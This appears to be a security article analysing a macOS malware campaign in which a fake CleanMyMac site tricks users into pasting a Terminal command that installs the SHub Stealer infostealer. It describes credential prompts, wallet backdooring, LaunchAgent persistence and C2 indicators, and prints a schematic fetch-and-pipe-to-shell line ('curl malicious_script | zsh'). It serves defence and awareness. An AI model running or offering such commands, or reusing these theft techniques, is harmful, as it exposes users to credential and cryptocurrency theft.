A new malware campaign targeting macOS users has been uncovered in which attackers impersonate the popular system utility CleanMyMac to distribute an infostealer called SHub Stealer. Instead of exploiting vulnerabilities, the attackers rely on social engineering—convincing users to paste a command into Terminal that downloads and executes malicious code.
This campaign demonstrates how macOS threats are evolving: attackers are increasingly using credential theft, wallet backdooring, and persistence mechanisms rather than traditional malware techniques.
Campaign Overview
The attack begins with a fraudulent website hosted at:
cleanmymacos[.]org
The site closely mimics the official CleanMyMac product page, making it difficult for users to distinguish it from the legitimate site. Victims are presented with what appears to be an advanced installation method, instructing them to open Terminal and paste a command to install the application.
This is a classic example of ClickFix-style delivery, where attackers trick users into executing malicious commands themselves rather than exploiting a system vulnerability.
Because the user voluntarily executes the command, macOS security controls such as Gatekeeper, notarization checks, and XProtect provide limited protection once the command is run.
Initial Infection Chain
The Terminal command used in the attack performs several steps in sequence:
- Displays a fake reference to the official CleanMyMac site to make the output look legitimate.
- Decodes a Base64-encoded URL that hides the true download location.
- Downloads a shell script from an attacker-controlled server.
- Pipes the script directly into
zsh, executing it immediately.
Example behavior:
echo "macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app"
decode_base64_url
curl malicious_script | zsh
From the victim’s perspective, nothing unusual appears to happen during execution.
Loader Stage and Geofencing
The downloaded shell script acts as a loader, which performs reconnaissance before deploying the main malware payload.
One of the first checks examines macOS keyboard settings to determine whether a Russian-language keyboard is installed. If detected, the malware sends a cis_blocked event to the command-and-control (C2) server and exits.
This geofencing behavior is common among malware developed in Russian-speaking cybercrime ecosystems. By avoiding systems in CIS countries, attackers reduce the risk of attracting attention from local authorities.
If the system passes the check, the loader sends a device profile to the C2 server:
- External IP address
- Hostname
- macOS version
- Keyboard locale
Each infected system is also tagged with a 32-character build hash, allowing attackers to track victims and campaigns individually.
Deployment of the AppleScript Payload
After profiling the system, the loader retrieves the main payload, an AppleScript hosted on the attacker’s infrastructure.
AppleScript is a built-in macOS automation language that allows programs to interact with system UI elements and applications. The malware leverages this legitimate feature to carry out several malicious actions.
The first step performed by the AppleScript is to close the Terminal window, hiding evidence of the infection process.
Credential Harvesting via Fake System Prompt
Next, the malware displays a dialog box designed to mimic a legitimate macOS system prompt.
The message reads:
Required Application Helper.
Please enter password for continue.
The prompt uses Apple’s padlock icon and “System Preferences” title to appear authentic. If the victim enters their password, the malware captures the macOS login credentials.
This password can then be used to unlock sensitive data stored in the Apple Keychain.
Data Theft Capabilities
SHub Stealer is designed to collect a wide range of sensitive information from the infected system, including:
- Browser data from 14 Chromium-based browsers and Firefox
- Saved passwords and authentication tokens
- macOS Keychain contents
- Telegram session data
- Apple Notes databases
- Shell history files
- Cryptocurrency wallet files
All collected data is packaged into an archive and uploaded to attacker-controlled infrastructure.
Backdooring Cryptocurrency Wallets
One of the most dangerous aspects of SHub Stealer is its ability to modify cryptocurrency wallet applications.
The malware specifically targets Electron-based wallets such as:
- Exodus
- Atomic Wallet
- Ledger Wallet
- Ledger Live
- Trezor Suite
Instead of simply stealing existing wallet data, the malware replaces application components (such as app.asar) to insert malicious logic.
Example Modifications
Ledger Wallet / Ledger Live
- TLS certificate validation is disabled.
- A fake wallet recovery wizard is injected.
- The wizard asks users to enter their seed phrase, which is then transmitted to the attacker’s server.
Trezor Suite
- Displays a fake “critical security update” overlay.
- Uses the application’s own BIP39 library to validate seed phrases before exfiltration.
These techniques allow attackers to steal recovery phrases, enabling them to fully control victims’ crypto assets.
Persistence Mechanism
To maintain access to infected systems, SHub Stealer installs a LaunchAgent:
~/Library/LaunchAgents/com.google.keystone.agent.plist
The name mimics Google’s Keystone updater, helping it blend in with legitimate system components.
The LaunchAgent executes a hidden update script every 60 seconds, allowing the attackers to:
- Receive commands from the C2 server
- Maintain persistence
- Update malware functionality
Command and Control Infrastructure
The campaign uses several domains for communication and data exfiltration:
res2erch-sl0ut[.]com
wallets-gate[.]io
These servers receive stolen data, manage infected hosts, and collect telemetry such as build identifiers and system profiles.
MITRE ATT&CK Mapping
The campaign maps to multiple MITRE ATT&CK techniques:
| Technique | Description |
|---|---|
| T1204 | User Execution (victim runs Terminal command) |
| T1059 | Command and scripting interpreter |
| T1547.001 | Persistence via LaunchAgent |
| T1071.001 | Web-based C2 communications |
| T1005 | Data collection from local system |
| T1555 | Credential theft from password stores |
| T1036 | Masquerading (fake Google Keystone agent) |
Why This Campaign Is Significant
This campaign highlights several important trends in macOS malware:
- Social engineering over exploitation
Attackers rely on convincing users to execute commands themselves. - Credential and crypto theft as the primary goal
Modern macOS malware focuses heavily on monetization through stolen credentials and wallets. - Use of legitimate system tools
AppleScript and LaunchAgents help attackers avoid detection. - Application-level backdooring
Instead of attacking the operating system, malware modifies installed wallet applications.
How Users Can Protect Themselves
Users can reduce risk by following these best practices:
- Never paste commands into Terminal from untrusted websites.
- Download software only from official developer sites or the App Store.
- Be cautious of look-alike domains.
- Use reputable endpoint protection software.
- Monitor cryptocurrency wallets for suspicious activity.
Legitimate macOS applications almost never require Terminal commands for installation, making such instructions a strong indicator of malicious activity.
✅ Conclusion
The fake CleanMyMac campaign demonstrates how attackers are refining macOS malware delivery techniques. By combining brand impersonation, social engineering, AppleScript automation, and wallet backdooring, the SHub Stealer campaign represents a sophisticated and financially motivated threat.
As macOS adoption continues to grow, attackers are clearly investing more effort into developing macOS-specific infostealers, making awareness and secure software distribution practices more important than ever.
